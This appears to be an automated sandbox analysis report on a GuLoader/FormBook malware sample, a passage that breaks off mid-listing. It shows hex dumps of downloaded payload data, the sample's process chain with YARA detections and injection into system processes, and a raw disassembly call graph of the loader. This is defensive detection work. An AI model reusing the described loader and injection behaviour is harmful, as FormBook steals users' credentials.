                                                                2024-02-28 12:26:24 UTC1252INData Raw: 38 50 76 ed 09 52 86 ee 7b 9d 5f 51 48 6b d4 9e 1d 05 8c 25 a5 25 04 25 a1 37 2b 22 76 38 7e 2e c6 8d f6 58 19 7a 1f b0 9a fd 37 b2 c5 16 df ad 5a 18 cd 17 a8 d8 ec 65 b1 60 b7 37 67 43 08 42 8d 8c 32 a8 a7 dd 0d 1c f6 c7 c0 16 7b 6a c7 84 e7 47 c0 98 fc 32 fb 56 d3 e8 bc 80 5c 45 84 d8 37 e6 9c 6e 05 3f 0a 2b a2 85 dc b1 7e 71 73 5f 21 54 98 07 a2 5c d8 a4 50 a9 8f 27 19 76 44 bc 67 90 01 ed 7b f8 70 56 f6 d2 da 56 ec f0 ea 9d 7a 46 2b e8 dc 63 f6 18 6e df bf 32 8a 05 9b f7 93 d6 4a 46 5b 9c 99 26 30 20 69 71 6f ef 34 20 ef 6f 10 9c ea 68 21 8e ca 47 09 11 fb 69 01 0f 95 e3 0e fb c4 3a 7c c7 00 32 f5 d2 69 37 ea 70 ca 2c 96 cf 7c e6 a5 81 32 ef 82 30 27 57 39 fa d2 dd 07 be 79 80 bb c5 a3 09 eb 98 58 d6 b6 6e fb ec 61 4d 9a 27 20 ce 10 a2 d3 5c 37 c8 57
                                                                Data Ascii: 8PvR{_QHk%%%7+"v8~.Xz7Ze`7gCB2{jG2V\E7n?+~qs_!T\P'vDg{pVVzF+cn2JF[&0 iqo4 oh!Gi:|2i7p,|20'W9yXnaM' \7W
                                                                2024-02-28 12:26:24 UTC1252INData Raw: 1d 86 86 15 da 91 8a ba eb 46 e1 00 1c 5f 54 fe bb cb 37 40 30 36 90 f5 90 c1 7a 7e 99 44 d1 4c 5f b3 d1 99 d2 45 0e 20 7f 41 44 a2 8b 2c 42 a0 57 04 fc 32 dd 27 15 20 39 83 e6 a0 96 9c a4 8e 56 73 69 61 7a 04 4a 9b 61 23 34 a6 59 1e db 72 31 5d 6e ee a1 26 ff 88 54 fb 57 cc 8b ac 28 a0 72 01 77 9f 8e 95 94 e4 b9 54 c1 30 c0 ac 49 a3 53 5b d4 cc 73 78 9c af bb d0 86 85 de 3e 97 b9 68 e8 e6 9a 7e 2f 36 30 b6 b0 a3 12 ae 4a 60 f2 45 12 93 35 a5 25 77 f5 52 17 64 2d 34 17 8f 99 eb a8 47 16 6d bb e7 07 5d 7b cd c6 50 09 1a 16 28 85 48 1c 91 49 b9 55 38 ac 6b e1 f9 9c 12 35 28 5a 97 11 b7 87 c5 ee 48 76 02 36 b5 58 41 17 8e 0b 8d 4f 75 0d 8f f9 60 b7 2c ef 04 cf 7e 2d 3f db cc e1 f4 3b 47 1a 6f 73 d8 f0 1b 07 11 51 08 dc fa 97 ef 82 6a 1e e9 c8 f3 90 64 52 04
                                                                Data Ascii: F_T7@06z~DL_E AD,BW2' 9VsiazJa#4Yr1]n&TW(rwT0IS[sx>h~/60J`E5%wRd-4Gm]{P(HIU8k5(ZHv6XAOu`,~-?;GosQjdR
                                                                2024-02-28 12:26:24 UTC1252INData Raw: db e6 ed f3 cb 89 e3 88 83 e9 ca c2 03 ff 0b c5 bb 6e 3f 40 b1 a4 c6 90 60 a9 94 64 a7 1c 17 cb e3 9a 9d a8 7e 6c fe 09 43 c1 13 c4 34 2e 59 37 df 00 fc 20 5a e2 e2 4b 26 ac c9 73 8a 0b c0 08 e4 77 08 af e3 75 87 6d 21 78 4f f5 5e 0a ac ea 42 71 8c 44 2c e5 14 1e 06 5c 82 24 1c ec fd c7 75 af 50 8d a1 46 49 13 c8 af 20 34 00 37 f5 90 52 65 62 ff d9 ce c4 b4 70 f8 0c f3 e5 39 ec 27 e7 88 6f a7 d4 d8 c4 29 6e 82 6c 33 de 80 e2 d2 a8 fa 46 a7 5f 6c 01 45 61 7b f9 69 c3 fa 76 65 79 76 df d4 e0 aa 25 8d 18 a9 bc b7 84 e8 23 51 67 17 f2 c3 ee db 71 f7 d7 ce ba 74 25 2f 03 69 6a de aa 03 f9 ab 33 88 48 b1 92 2a 17 b9 a0 12 cb ba 54 d0 cf e4 d3 de c8 a6 05 63 db dc fc 9a f6 33 68 35 f2 87 62 8d c8 bd b5 19 5e 9a eb 2c 96 f5 50 7e 64 b2 bb 3c f2 24 8b 02 a5 2a 45
                                                                Data Ascii: n?@`d~lC4.Y7 ZK&swum!xO^BqD,\$uPFI 47Rebp9'o)nl3F_lEa{iveyv%#Qgqt%/ij3H*Tc3h5b^,P~d<$*E
                                                                2024-02-28 12:26:24 UTC1252INData Raw: 5e 57 24 3e 31 04 d5 44 2d 2b 11 70 c2 2a c4 00 83 79 b4 5f 24 c8 3f 67 d9 8d 4f cc d5 1e 4b 37 19 ee 97 27 45 91 35 41 da 24 7e 72 04 be 43 e0 00 fa 56 cb 36 1e e3 e2 9a 42 ea 49 4e 60 fe 16 5c 86 42 9c 0e 72 7a c8 6f bc 3b 7d c6 22 dc 03 bb 17 f4 b1 c1 a5 4b 24 ed 0d 3f 7b 67 2e 39 92 33 2b 8c a8 2a eb 7f 07 f2 ff 01 2c 9c 6c 63 ef 9e 65 55 b7 28 68 99 3c a5 d2 3c 64 05 e8 6e d1 de f5 2c c5 ca 52 75 ac 18 ff 35 35 31 83 49 f3 57 24 a0 7d 4c 1b f3 be e1 c5 9b a1 c0 5c a5 77 95 11 d2 43 9f ad f9 e4 56 f1 e5 9d 86 21 9c be b3 4e 0c fc e2 b1 d1 af c7 fc 9b e6 1d 0e b9 42 74 8c 92 ca 58 f7 8f a5 00 e2 49 69 22 60 be 54 9c d7 22 80 72 39 f3 f6 45 f3 5d 3a 6d 9b 06 53 33 ec c3 8b 1c 06 71 9e 74 57 10 bf 6b c4 6f a4 2b 34 e0 fe f4 34 23 d4 72 bc bd 8d 86 9b 55
                                                                Data Ascii: ^W$>1D-+p*y_$?gOK7'E5A$~rCV6BIN`\Brzo;}"K$?{g.93+*,lceU(h<<dn,Ru551IW$}L\wCV!NBtXIi"`T"r9E]:mS3qtWko+44#rU


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:13:25:37
                                                                Start date:28/02/2024
                                                                Path:C:\Users\user\Desktop\rResegregation.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\rResegregation.exe
                                                                Imagebase:0x400000
                                                                File size:883'592 bytes
                                                                MD5 hash:B64F1F87FDC7E8BD3D053D058FC08F4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.28752832983.0000000005595000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:13:26:09
                                                                Start date:28/02/2024
                                                                Path:C:\Users\user\Desktop\rResegregation.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\rResegregation.exe
                                                                Imagebase:0x400000
                                                                File size:883'592 bytes
                                                                MD5 hash:B64F1F87FDC7E8BD3D053D058FC08F4E
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:13:26:28
                                                                Start date:28/02/2024
                                                                Path:C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe"
                                                                Imagebase:0x350000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:5
                                                                Start time:13:26:30
                                                                Start date:28/02/2024
                                                                Path:C:\Windows\SysWOW64\winrshost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\winrshost.exe
                                                                Imagebase:0x220000
                                                                File size:24'064 bytes
                                                                MD5 hash:9EB3371F7B80A434CC9F468B330A9928
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:13:26:37
                                                                Start date:28/02/2024
                                                                Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                Imagebase:0x140000000
                                                                File size:16'696'840 bytes
                                                                MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:7
                                                                Start time:13:29:04
                                                                Start date:28/02/2024
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0x7ff7b4420000
                                                                File size:4'849'904 bytes
                                                                MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:20.8%
                                                                  Dynamic/Decrypted Code Coverage:14.4%
                                                                  Signature Coverage:20.9%
                                                                  Total number of Nodes:1461
                                                                  Total number of Limit Nodes:42
                                                                  execution_graph 4732 10001000 4735 1000101b 4732->4735 4742 100014bb 4735->4742 4737 10001020 4738 10001024 4737->4738 4739 10001027 GlobalAlloc 4737->4739 4740 100014e2 3 API calls 4738->4740 4739->4738 4741 10001019 4740->4741 4744 100014c1 4742->4744 4743 100014c7 4743->4737 4744->4743 4745 100014d3 GlobalFree 4744->4745 4745->4737 4746 4027c1 4747 402a1d 18 API calls 4746->4747 4748 4027c7 4747->4748 4749 402802 4748->4749 4750 4027eb 4748->4750 4755 4026a6 4748->4755 4752 402818 4749->4752 4753 40280c 4749->4753 4751 4027f0 4750->4751 4759 4027ff 4750->4759 4760 405d0c lstrcpynA 4751->4760 4756 405d2e 18 API calls 4752->4756 4754 402a1d 18 API calls 4753->4754 4754->4759 4756->4759 4759->4755 4761 405c6a wsprintfA 4759->4761 4760->4755 4761->4755 4762 401cc2 4763 402a1d 18 API calls 4762->4763 4764 401cd2 SetWindowLongA 4763->4764 4765 4028cf 4764->4765 4766 401a43 4767 402a1d 18 API calls 4766->4767 4768 401a49 4767->4768 4769 402a1d 18 API calls 4768->4769 4770 4019f3 4769->4770 3878 401e44 3879 402a3a 18 API calls 3878->3879 3880 401e4a 3879->3880 3881 404f25 25 API calls 3880->3881 3882 401e54 3881->3882 3894 40549d CreateProcessA 3882->3894 3884 401e5a 3885 401eb0 CloseHandle 3884->3885 3886 401e79 WaitForSingleObject 3884->3886 3887 4026a6 3884->3887 3897 4060e1 3884->3897 3885->3887 3886->3884 3888 401e87 GetExitCodeProcess 3886->3888 3890 401ea4 3888->3890 3891 401e99 3888->3891 3890->3885 3892 401ea2 3890->3892 3901 405c6a wsprintfA 3891->3901 3892->3885 3895 4054d0 CloseHandle 3894->3895 3896 4054dc 3894->3896 3895->3896 3896->3884 3898 4060fe PeekMessageA 3897->3898 3899 4060f4 DispatchMessageA 3898->3899 3900 40610e 3898->3900 3899->3898 3900->3886 3901->3892 4771 402644 4772 40264a 4771->4772 4773 402652 FindClose 4772->4773 4774 4028cf 4772->4774 4773->4774 4775 4026c6 4776 402a3a 18 API calls 4775->4776 4777 4026d4 4776->4777 4778 4026ea 4777->4778 4779 402a3a 18 API calls 4777->4779 4780 40595a 2 API calls 4778->4780 4779->4778 4781 4026f0 4780->4781 4803 40597f GetFileAttributesA CreateFileA 4781->4803 4783 4026fd 4784 4027a0 4783->4784 4785 402709 GlobalAlloc 4783->4785 4788 4027a8 DeleteFileA 4784->4788 4789 4027bb 4784->4789 4786 402722 4785->4786 4787 402797 CloseHandle 4785->4787 4804 4030a4 SetFilePointer 4786->4804 4787->4784 4788->4789 4791 402728 4792 40308e ReadFile 4791->4792 4793 402731 GlobalAlloc 4792->4793 4794 402741 4793->4794 4795 402775 4793->4795 4796 402e9f 32 API calls 4794->4796 4797 405a26 WriteFile 4795->4797 4802 40274e 4796->4802 4798 402781 GlobalFree 4797->4798 4799 402e9f 32 API calls 4798->4799 4800 402794 4799->4800 4800->4787 4801 40276c GlobalFree 4801->4795 4802->4801 4803->4783 4804->4791 3950 4022c7 3951 402a3a 18 API calls 3950->3951 3952 4022d8 3951->3952 3953 402a3a 18 API calls 3952->3953 3954 4022e1 3953->3954 3955 402a3a 18 API calls 3954->3955 3956 4022eb GetPrivateProfileStringA 3955->3956 4805 402847 4806 402a1d 18 API calls 4805->4806 4807 40284d 4806->4807 4808 40285b 4807->4808 4809 40287e 4807->4809 4811 4026a6 4807->4811 4808->4811 4813 405c6a wsprintfA 4808->4813 4810 405d2e 18 API calls 4809->4810 4809->4811 4810->4811 4813->4811 4814 40364a 4815 403655 4814->4815 4816 403659 4815->4816 4817 40365c GlobalAlloc 4815->4817 4817->4816 4121 1000270b 4122 1000275b 4121->4122 4123 1000271b VirtualProtect 4121->4123 4123->4122 4821 1000180d 4823 10001830 4821->4823 4822 10001872 4825 10001266 2 API calls 4822->4825 4823->4822 4824 10001860 GlobalFree 4823->4824 4824->4822 4826 100019e3 GlobalFree GlobalFree 4825->4826 4567 401751 4568 402a3a 18 API calls 4567->4568 4569 401758 4568->4569 4570 401776 4569->4570 4571 40177e 4569->4571 4607 405d0c lstrcpynA 4570->4607 4608 405d0c lstrcpynA 4571->4608 4574 40177c 4578 405f77 5 API calls 4574->4578 4575 401789 4576 40577e 3 API calls 4575->4576 4577 40178f lstrcatA 4576->4577 4577->4574 4600 40179b 4578->4600 4579 4017dc 4581 40595a 2 API calls 4579->4581 4580 406010 2 API calls 4580->4600 4581->4600 4583 4017b2 CompareFileTime 4583->4600 4584 401876 4586 404f25 25 API calls 4584->4586 4585 40184d 4587 404f25 25 API calls 4585->4587 4605 401862 4585->4605 4588 401880 4586->4588 4587->4605 4589 402e9f 32 API calls 4588->4589 4591 401893 4589->4591 4590 405d0c lstrcpynA 4590->4600 4592 4018a7 SetFileTime 4591->4592 4593 4018b9 CloseHandle 4591->4593 4592->4593 4595 4018ca 4593->4595 4593->4605 4594 405d2e 18 API calls 4594->4600 4596 4018e2 4595->4596 4597 4018cf 4595->4597 4599 405d2e 18 API calls 4596->4599 4598 405d2e 18 API calls 4597->4598 4601 4018d7 lstrcatA 4598->4601 4602 4018ea 4599->4602 4600->4579 4600->4580 4600->4583 4600->4584 4600->4585 4600->4590 4600->4594 4603 405502 MessageBoxIndirectA 4600->4603 4606 40597f GetFileAttributesA CreateFileA 4600->4606 4601->4602 4604 405502 MessageBoxIndirectA 4602->4604 4603->4600 4604->4605 4606->4600 4607->4574 4608->4575 4827 401651 4828 402a3a 18 API calls 4827->4828 4829 401657 4828->4829 4830 406010 2 API calls 4829->4830 4831 40165d 4830->4831 4832 401951 4833 402a1d 18 API calls 4832->4833 4834 401958 4833->4834 4835 402a1d 18 API calls 4834->4835 4836 401962 4835->4836 4837 402a3a 18 API calls 4836->4837 4838 40196b 4837->4838 4839 40197e lstrlenA 4838->4839 4843 4019b9 4838->4843 4840 401988 4839->4840 4840->4843 4845 405d0c lstrcpynA 4840->4845 4842 4019a2 4842->4843 4844 4019af lstrlenA 4842->4844 4844->4843 4845->4842 4846 4019d2 4847 402a3a 18 API calls 4846->4847 4848 4019d9 4847->4848 4849 402a3a 18 API calls 4848->4849 4850 4019e2 4849->4850 4851 4019e9 lstrcmpiA 4850->4851 4852 4019fb lstrcmpA 4850->4852 4853 4019ef 4851->4853 4852->4853 4854 4021d2 4855 402a3a 18 API calls 4854->4855 4856 4021d8 4855->4856 4857 402a3a 18 API calls 4856->4857 4858 4021e1 4857->4858 4859 402a3a 18 API calls 4858->4859 4860 4021ea 4859->4860 4861 406010 2 API calls 4860->4861 4862 4021f3 4861->4862 4863 402204 lstrlenA lstrlenA 4862->4863 4864 4021f7 4862->4864 4866 404f25 25 API calls 4863->4866 4865 404f25 25 API calls 4864->4865 4868 4021ff 4864->4868 4865->4868 4867 402240 SHFileOperationA 4866->4867 4867->4864 4867->4868 4869 402254 4870 40225b 4869->4870 4874 40226e 4869->4874 4871 405d2e 18 API calls 4870->4871 4872 402268 4871->4872 4873 405502 MessageBoxIndirectA 4872->4873 4873->4874 4875 4014d6 4876 402a1d 18 API calls 4875->4876 4877 4014dc Sleep 4876->4877 4879 4028cf 4877->4879 4880 1000161a 4881 10001649 4880->4881 4882 10001a5d 18 API calls 4881->4882 4883 10001650 4882->4883 4884 10001663 4883->4884 4885 10001657 4883->4885 4887 1000168a 4884->4887 4888 1000166d 4884->4888 4886 10001266 2 API calls 4885->4886 4891 10001661 4886->4891 4889 10001690 4887->4889 4890 100016b4 4887->4890 4892 100014e2 3 API calls 4888->4892 4893 10001559 3 API calls 4889->4893 4894 100014e2 3 API calls 4890->4894 4895 10001672 4892->4895 4896 10001695 4893->4896 4894->4891 4897 10001559 3 API calls 4895->4897 4899 10001266 2 API calls 4896->4899 4898 10001678 4897->4898 4900 10001266 2 API calls 4898->4900 4901 1000169b GlobalFree 4899->4901 4902 1000167e GlobalFree 4900->4902 4901->4891 4903 100016af GlobalFree 4901->4903 4902->4891 4903->4891 4638 40155b 4639 401577 ShowWindow 4638->4639 4640 40157e 4638->4640 4639->4640 4641 40158c ShowWindow 4640->4641 4642 4028cf 4640->4642 4641->4642 4643 40255c 4644 402a1d 18 API calls 4643->4644 4649 402566 4644->4649 4645 4025d0 4646 4059f7 ReadFile 4646->4649 4647 4025d2 4652 405c6a wsprintfA 4647->4652 4648 4025e2 4648->4645 4651 4025f8 SetFilePointer 4648->4651 4649->4645 4649->4646 4649->4647 4649->4648 4651->4645 4652->4645 4904 40205e 4905 402a3a 18 API calls 4904->4905 4906 402065 4905->4906 4907 402a3a 18 API calls 4906->4907 4908 40206f 4907->4908 4909 402a3a 18 API calls 4908->4909 4910 402079 4909->4910 4911 402a3a 18 API calls 4910->4911 4912 402083 4911->4912 4913 402a3a 18 API calls 4912->4913 4914 40208d 4913->4914 4915 4020cc CoCreateInstance 4914->4915 4916 402a3a 18 API calls 4914->4916 4919 4020eb 4915->4919 4921 402193 4915->4921 4916->4915 4917 401423 25 API calls 4918 4021c9 4917->4918 4920 402173 MultiByteToWideChar 4919->4920 4919->4921 4920->4921 4921->4917 4921->4918 4922 40265e 4923 402664 4922->4923 4924 402668 FindNextFileA 4923->4924 4927 40267a 4923->4927 4925 4026b9 4924->4925 4924->4927 4928 405d0c lstrcpynA 4925->4928 4928->4927 4929 401cde GetDlgItem GetClientRect 4930 402a3a 18 API calls 4929->4930 4931 401d0e LoadImageA SendMessageA 4930->4931 4932 401d2c DeleteObject 4931->4932 4933 4028cf 4931->4933 4932->4933 4934 401662 4935 402a3a 18 API calls 4934->4935 4936 401669 4935->4936 4937 402a3a 18 API calls 4936->4937 4938 401672 4937->4938 4939 402a3a 18 API calls 4938->4939 4940 40167b MoveFileA 4939->4940 4941 40168e 4940->4941 4947 401687 4940->4947 4942 406010 2 API calls 4941->4942 4945 4021c9 4941->4945 4944 40169d 4942->4944 4943 401423 25 API calls 4943->4945 4944->4945 4946 405bc7 38 API calls 4944->4946 4946->4947 4947->4943 3729 405063 3730 405085 GetDlgItem GetDlgItem GetDlgItem 3729->3730 3731 40520e 3729->3731 3775 403f26 SendMessageA 3730->3775 3733 405216 GetDlgItem CreateThread CloseHandle 3731->3733 3734 40523e 3731->3734 3733->3734 3848 404ff7 OleInitialize 3733->3848 3736 40526c 3734->3736 3739 405254 ShowWindow ShowWindow 3734->3739 3740 40528d 3734->3740 3735 4050f5 3744 4050fc GetClientRect GetSystemMetrics SendMessageA SendMessageA 3735->3744 3737 405274 3736->3737 3738 4052c7 3736->3738 3741 4052a0 ShowWindow 3737->3741 3742 40527c 3737->3742 3738->3740 3751 4052d4 SendMessageA 3738->3751 3780 403f26 SendMessageA 3739->3780 3784 403f58 3740->3784 3747 4052c0 3741->3747 3748 4052b2 3741->3748 3781 403eca 3742->3781 3749 40516a 3744->3749 3750 40514e SendMessageA SendMessageA 3744->3750 3753 403eca SendMessageA 3747->3753 3798 404f25 3748->3798 3754 40517d 3749->3754 3755 40516f SendMessageA 3749->3755 3750->3749 3756 405299 3751->3756 3757 4052ed CreatePopupMenu 3751->3757 3753->3738 3776 403ef1 3754->3776 3755->3754 3809 405d2e 3757->3809 3761 40518d 3764 405196 ShowWindow 3761->3764 3765 4051ca GetDlgItem SendMessageA 3761->3765 3762 40531b GetWindowRect 3763 40532e TrackPopupMenu 3762->3763 3763->3756 3766 40534a 3763->3766 3767 4051b9 3764->3767 3768 4051ac ShowWindow 3764->3768 3765->3756 3769 4051f1 SendMessageA SendMessageA 3765->3769 3770 405369 SendMessageA 3766->3770 3779 403f26 SendMessageA 3767->3779 3768->3767 3769->3756 3770->3770 3771 405386 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3770->3771 3773 4053a8 SendMessageA 3771->3773 3773->3773 3774 4053ca GlobalUnlock SetClipboardData CloseClipboard 3773->3774 3774->3756 3775->3735 3777 405d2e 18 API calls 3776->3777 3778 403efc SetDlgItemTextA 3777->3778 3778->3761 3779->3765 3780->3736 3782 403ed1 3781->3782 3783 403ed7 SendMessageA 3781->3783 3782->3783 3783->3740 3785 403f70 GetWindowLongA 3784->3785 3795 403ff9 3784->3795 3786 403f81 3785->3786 3785->3795 3787 403f90 GetSysColor 3786->3787 3788 403f93 3786->3788 3787->3788 3789 403fa3 SetBkMode 3788->3789 3790 403f99 SetTextColor 3788->3790 3791 403fc1 3789->3791 3792 403fbb GetSysColor 3789->3792 3790->3789 3793 403fd2 3791->3793 3794 403fc8 SetBkColor 3791->3794 3792->3791 3793->3795 3796 403fe5 DeleteObject 3793->3796 3797 403fec CreateBrushIndirect 3793->3797 3794->3793 3795->3756 3796->3797 3797->3795 3799 404f40 3798->3799 3807 404fe3 3798->3807 3800 404f5d lstrlenA 3799->3800 3801 405d2e 18 API calls 3799->3801 3802 404f86 3800->3802 3803 404f6b lstrlenA 3800->3803 3801->3800 3805 404f99 3802->3805 3806 404f8c SetWindowTextA 3802->3806 3804 404f7d lstrcatA 3803->3804 3803->3807 3804->3802 3805->3807 3808 404f9f SendMessageA SendMessageA SendMessageA 3805->3808 3806->3805 3807->3747 3808->3807 3814 405d3b 3809->3814 3810 405f5e 3811 4052fd AppendMenuA 3810->3811 3843 405d0c lstrcpynA 3810->3843 3811->3762 3811->3763 3813 405ddc GetVersion 3813->3814 3814->3810 3814->3813 3815 405f35 lstrlenA 3814->3815 3818 405d2e 10 API calls 3814->3818 3820 405e54 GetSystemDirectoryA 3814->3820 3821 405e67 GetWindowsDirectoryA 3814->3821 3823 405e9b SHGetSpecialFolderLocation 3814->3823 3824 405d2e 10 API calls 3814->3824 3825 405ede lstrcatA 3814->3825 3827 405bf3 RegOpenKeyExA 3814->3827 3832 405f77 3814->3832 3841 405c6a wsprintfA 3814->3841 3842 405d0c lstrcpynA 3814->3842 3815->3814 3818->3815 3820->3814 3821->3814 3823->3814 3826 405eb3 SHGetPathFromIDListA CoTaskMemFree 3823->3826 3824->3814 3825->3814 3826->3814 3828 405c64 3827->3828 3829 405c26 RegQueryValueExA 3827->3829 3828->3814 3830 405c47 RegCloseKey 3829->3830 3830->3828 3839 405f83 3832->3839 3833 405feb 3834 405fef CharPrevA 3833->3834 3836 40600a 3833->3836 3834->3833 3835 405fe0 CharNextA 3835->3833 3835->3839 3836->3814 3838 405fce CharNextA 3838->3839 3839->3833 3839->3835 3839->3838 3840 405fdb CharNextA 3839->3840 3844 4057a9 3839->3844 3840->3835 3841->3814 3842->3814 3843->3811 3845 4057af 3844->3845 3846 4057c2 3845->3846 3847 4057b5 CharNextA 3845->3847 3846->3839 3847->3845 3855 403f3d 3848->3855 3850 405041 3851 403f3d SendMessageA 3850->3851 3852 405053 OleUninitialize 3851->3852 3853 40501a 3853->3850 3858 401389 3853->3858 3856 403f55 3855->3856 3857 403f46 SendMessageA 3855->3857 3856->3853 3857->3856 3860 401390 3858->3860 3859 4013fe 3859->3853 3860->3859 3861 4013cb MulDiv SendMessageA 3860->3861 3861->3860 3902 402364 3903 40236a 3902->3903 3904 402a3a 18 API calls 3903->3904 3905 40237c 3904->3905 3906 402a3a 18 API calls 3905->3906 3907 402386 RegCreateKeyExA 3906->3907 3908 4023b0 3907->3908 3910 4026a6 3907->3910 3909 4023c8 3908->3909 3911 402a3a 18 API calls 3908->3911 3915 4023d4 3909->3915 3939 402a1d 3909->3939 3913 4023c1 lstrlenA 3911->3913 3912 4023ef RegSetValueExA 3917 402405 RegCloseKey 3912->3917 3913->3909 3915->3912 3919 402e9f 3915->3919 3917->3910 3921 402eb5 3919->3921 3920 402ee3 3942 40308e 3920->3942 3921->3920 3947 4030a4 SetFilePointer 3921->3947 3925 403011 3925->3912 3926 402f00 GetTickCount 3926->3925 3932 402f2c 3926->3932 3927 403027 3928 403069 3927->3928 3931 40302b 3927->3931 3929 40308e ReadFile 3928->3929 3929->3925 3930 40308e ReadFile 3930->3932 3931->3925 3933 40308e ReadFile 3931->3933 3934 405a26 WriteFile 3931->3934 3932->3925 3932->3930 3935 402f82 GetTickCount 3932->3935 3936 402fa7 MulDiv wsprintfA 3932->3936 3945 405a26 WriteFile 3932->3945 3933->3931 3934->3931 3935->3932 3937 404f25 25 API calls 3936->3937 3937->3932 3940 405d2e 18 API calls 3939->3940 3941 402a31 3940->3941 3941->3915 3948 4059f7 ReadFile 3942->3948 3946 405a44 3945->3946 3946->3932 3947->3920 3949 402eee 3948->3949 3949->3925 3949->3926 3949->3927 4948 4042e8 4949 4042f8 4948->4949 4950 40431e 4948->4950 4952 403ef1 19 API calls 4949->4952 4951 403f58 8 API calls 4950->4951 4954 40432a 4951->4954 4953 404305 SetDlgItemTextA 4952->4953 4953->4950 4955 401dea 4956 402a3a 18 API calls 4955->4956 4957 401df0 4956->4957 4958 402a3a 18 API calls 4957->4958 4959 401df9 4958->4959 4960 402a3a 18 API calls 4959->4960 4961 401e02 4960->4961 4962 402a3a 18 API calls 4961->4962 4963 401e0b 4962->4963 4964 401423 25 API calls 4963->4964 4965 401e12 ShellExecuteA 4964->4965 4966 401e3f 4965->4966 4124 4030ec SetErrorMode GetVersion 4125 403123 4124->4125 4126 403129 4124->4126 4127 4060a5 5 API calls 4125->4127 4128 406037 3 API calls 4126->4128 4127->4126 4129 40313f lstrlenA 4128->4129 4129->4126 4130 40314e 4129->4130 4131 4060a5 5 API calls 4130->4131 4132 403156 4131->4132 4133 4060a5 5 API calls 4132->4133 4134 40315d #17 OleInitialize SHGetFileInfoA 4133->4134 4212 405d0c lstrcpynA 4134->4212 4136 40319a GetCommandLineA 4213 405d0c lstrcpynA 4136->4213 4138 4031ac GetModuleHandleA 4139 4031c3 4138->4139 4140 4057a9 CharNextA 4139->4140 4141 4031d7 CharNextA 4140->4141 4149 4031e7 4141->4149 4142 4032b1 4143 4032c4 GetTempPathA 4142->4143 4214 4030bb 4143->4214 4145 4032dc 4146 4032e0 GetWindowsDirectoryA lstrcatA 4145->4146 4147 403336 DeleteFileA 4145->4147 4150 4030bb 12 API calls 4146->4150 4224 402c66 GetTickCount GetModuleFileNameA 4147->4224 4148 4057a9 CharNextA 4148->4149 4149->4142 4149->4148 4153 